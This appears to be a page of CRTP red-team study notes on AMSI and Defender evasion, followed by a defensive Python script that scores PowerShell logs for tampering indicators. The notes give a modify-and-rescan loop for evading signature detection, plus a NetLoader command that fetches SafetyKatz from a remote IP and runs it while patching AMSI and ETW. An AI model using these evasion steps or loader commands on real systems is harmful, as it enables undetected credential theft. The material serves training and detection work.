CRTP Certified Red Team Professional
AMSI Bypass

Explore an insightful article about CRTP AMSI Bypass - a key technique in cybersecurity. This piece delves into its design, functionality, and crucial role in securing network infrastructures.


Last updated 1 year ago


Bypass Defences On-Memory

Bypass Defences On-Disk

AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1

DefenderCheck.exe PowerUp.ps1

Steps to avoid signature-based detection are pretty simple:

1) Scan using AMSITrigger

2) Modify the detected code snippet

3) Rescan using AMSITrigger

4) Repeat steps 2 & 3 until the result is "AMSI_RESULT_NOT_DETECTED" or "BLANK"

Payload Delivery

NetLoader (Loader.exe) can be used to load a binary from a file path or URL and patch AMSI & ETW while executing it.

C:\Users\Public\Loader.exe -path http://192.168.100.X/SafetyKatz.exe

Summary of Bypassing Defence Mechanisms

To evade on-memory and on-disk defences, the process involves iteratively modifying and rescanning scripts or executables with signature-locating tools like AMSITrigger and DefenderCheck. The cycle of modification and rescanning continues until these tools no longer flag any part of the code, indicating a successful bypass.

  • On-Memory Bypass Routine:

    1. Execute AMSITrigger to identify detectable code.

    2. Alter the code flagged by AMSITrigger.

    3. Rescan with AMSITrigger post-modification.

    4. Repeat until "AMSI_RESULT_NOT_DETECTED" appears.

  • Delivery of Payload:

    A loader can be utilized for delivering a payload, which involves fetching and executing a binary from either a local path or a remote URL. The loader patches both AMSI and ETW before execution, helping the payload avoid detection while it runs. A typical command for this operation follows the format:

    Loader.exe -path <binary_source>
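The routine above is what a defender needs to spot: a script block that touches AMSI or ETW internals before anything else runs. The following is an added example (not part of these notes or of any tool they link) that scores PowerShell script block log text (Event ID 4104, Microsoft-Windows-PowerShell/Operational) against a small set of tampering indicators and returns the records worth alerting on. The field names (RecordId, User, ScriptBlockText), the indicator weights and the sample records are all assumptions; the samples are constructed and deliberately non-functional.

```python
"""Defender-side helper: score PowerShell script-block log text for AMSI/ETW
tampering indicators.

Added example, not part of the CRTP notes or of any tool the page names.
It assumes Event ID 4104 records have been exported with at least a
ScriptBlockText field; the sample records below are constructed and
deliberately non-functional.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Indicator patterns with weights. Individual tokens also occur in legitimate
# scripts, so a record alerts only when the summed weight reaches THRESHOLD.
# The list is a constructed subset of what public detection rules look for.
INDICATORS: dict[str, int] = {
    r"amsiutils": 3,
    r"amsiinitfailed": 4,
    r"amsiscanbuffer": 4,
    r"amsi\.dll": 2,
    r"etweventwrite": 4,
    r"virtualprotect": 2,
    r"\[ref\]\.assembly\.gettype": 2,
    r"nonpublic\s*,\s*static": 2,
}
THRESHOLD = 5


@dataclass
class Finding:
    record_id: int
    user: str
    score: int
    matched: list[str] = field(default_factory=list)


def score_text(text: str) -> tuple[int, list[str]]:
    """Return (total weight, matched indicator patterns) for one script block."""
    lowered = text.lower()
    matched = [pat for pat in INDICATORS if re.search(pat, lowered)]
    return sum(INDICATORS[pat] for pat in matched), matched


def scan_events(events: list[dict]) -> list[Finding]:
    """Return a Finding for every record whose score reaches THRESHOLD."""
    findings = []
    for ev in events:
        score, matched = score_text(ev.get("ScriptBlockText", ""))
        if score >= THRESHOLD:
            findings.append(Finding(ev["RecordId"], ev["User"], score, matched))
    return findings


# Constructed sample records (not real telemetry). Records 2 and 4 mention
# AMSI/ETW internals the way tampering scripts do but are not working bypasses;
# record 3 shows a single reflection hit staying below the threshold.
SAMPLE_EVENTS = [
    {"RecordId": 1, "User": r"CORP\admin",
     "ScriptBlockText": "Get-ADUser -Filter * | Select-Object Name, Enabled"},
    {"RecordId": 2, "User": r"CORP\jdoe",
     "ScriptBlockText": "$t = 'System.Management.Automation.AmsiUtils'; "
                        "$f = 'amsiInitFailed'; Write-Output 'constructed sample'"},
    {"RecordId": 3, "User": r"CORP\svc_build",
     "ScriptBlockText": "Add-Type -Path .\\Helper.dll; [Ref].Assembly.GetType('Foo')"},
    {"RecordId": 4, "User": r"CORP\jdoe",
     "ScriptBlockText": "$p = 'VirtualProtect'; $e = 'EtwEventWrite'; # constructed"},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"record {f.record_id} user={f.user} score={f.score} matched={f.matched}")
```

Weighted scoring rather than a single-string match keeps one-off reflection calls in build scripts (record 3) out of the alert queue while still catching records that combine two or more AMSI/ETW references. Script block logging must be enabled for this to see anything, and the bypass routine in these notes works precisely by rewriting the flagged strings, so the indicator list needs the same periodic review a signature set does.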
AMSITrigger
DefenderCheck
Invoke-Obfuscation
GitHub - Flangvik/NetLoader: Loads any C# binary in mem, patching AMSI + ETW.